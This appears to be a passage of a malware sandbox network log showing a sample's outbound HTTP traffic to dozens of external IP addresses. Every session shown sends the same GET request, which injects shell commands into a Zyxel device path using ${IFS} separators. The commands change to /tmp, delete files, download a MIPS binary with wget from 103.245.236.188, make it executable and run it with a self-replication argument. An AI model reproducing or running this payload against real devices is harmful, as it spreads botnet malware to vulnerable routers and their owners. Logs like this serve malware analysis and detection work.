                                                Jan 12, 2024 18:16:10.145659924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1180192.168.2.2344516197.82.61.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145720005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1181192.168.2.2349552197.222.88.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145746946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1182192.168.2.234109899.48.164.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145771027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1183192.168.2.2343518213.109.31.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145816088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1184192.168.2.234736089.91.41.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145864010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1185192.168.2.235171248.215.64.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145900965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1186192.168.2.2344880201.79.89.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145932913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1187192.168.2.235269070.101.203.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.145963907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1188192.168.2.2338694213.240.142.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146018028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1189192.168.2.2339344195.133.163.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146049023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1190192.168.2.2354680131.232.122.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146091938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1191192.168.2.2342398134.251.237.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146116018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1192192.168.2.234975265.120.105.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146167040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1193192.168.2.2347288149.154.239.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146197081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1194192.168.2.233318214.118.28.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146248102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1195192.168.2.2354752212.47.216.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146301985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1196192.168.2.2338858129.101.150.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146348953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1197192.168.2.2351280182.25.42.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146348953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1198192.168.2.2350280140.56.11.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146387100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1199192.168.2.23436745.32.12.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146441936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1200192.168.2.2353580150.82.22.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146493912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1201192.168.2.2336762153.39.183.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146517992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1202192.168.2.2349060135.238.17.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146552086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1203192.168.2.234610095.45.184.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146585941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1204192.168.2.2349264184.52.120.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146611929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1205192.168.2.2348894161.198.70.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146657944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1206192.168.2.2339194187.115.213.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146682024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1207192.168.2.233678290.243.89.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146718979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1208192.168.2.235622870.82.156.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146796942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1209192.168.2.2334276169.226.204.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146826029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1210192.168.2.2337424185.128.47.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146878004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1211192.168.2.235204863.171.248.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146917105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1212192.168.2.235073879.29.72.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146939039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1213192.168.2.2333194165.132.81.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.146992922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1214192.168.2.233847065.49.150.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147054911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1215192.168.2.2353552114.194.46.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147092104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1216192.168.2.2355972146.150.128.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147140980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1217192.168.2.2357436115.140.119.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147181034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1218192.168.2.2338844113.225.7.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147202969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1219192.168.2.2347248177.6.155.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147253990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1220192.168.2.2360218137.61.67.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147294998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1221192.168.2.2348604187.159.79.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147330046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1222192.168.2.2341428179.246.128.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147372961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1223192.168.2.235390284.44.24.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147427082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1224192.168.2.234079673.163.57.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147459030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1225192.168.2.235544849.217.159.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147480965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1226192.168.2.233512272.1.58.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147528887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1227192.168.2.233764073.210.157.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147567034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1228192.168.2.234420049.185.40.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147588968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1229192.168.2.233930676.123.177.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147649050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1230192.168.2.2344996208.191.11.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147682905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1231192.168.2.2349894180.230.210.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147715092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1232192.168.2.2339980194.89.204.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147758961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1233192.168.2.233302043.144.42.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147814035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1234192.168.2.234816888.183.234.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147835016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1235192.168.2.2352096117.192.249.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147861004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1236192.168.2.235463654.12.36.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147921085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1237192.168.2.2358448169.121.211.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147953033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1238192.168.2.2343036176.94.235.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.147989035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1239192.168.2.2358228204.238.110.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148014069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1240192.168.2.234959681.103.80.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148067951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1241192.168.2.233445887.230.122.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:10.148099899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1242192.168.2.235777027.251.63.58443
                                                TimestampBytes transferredDirectionData
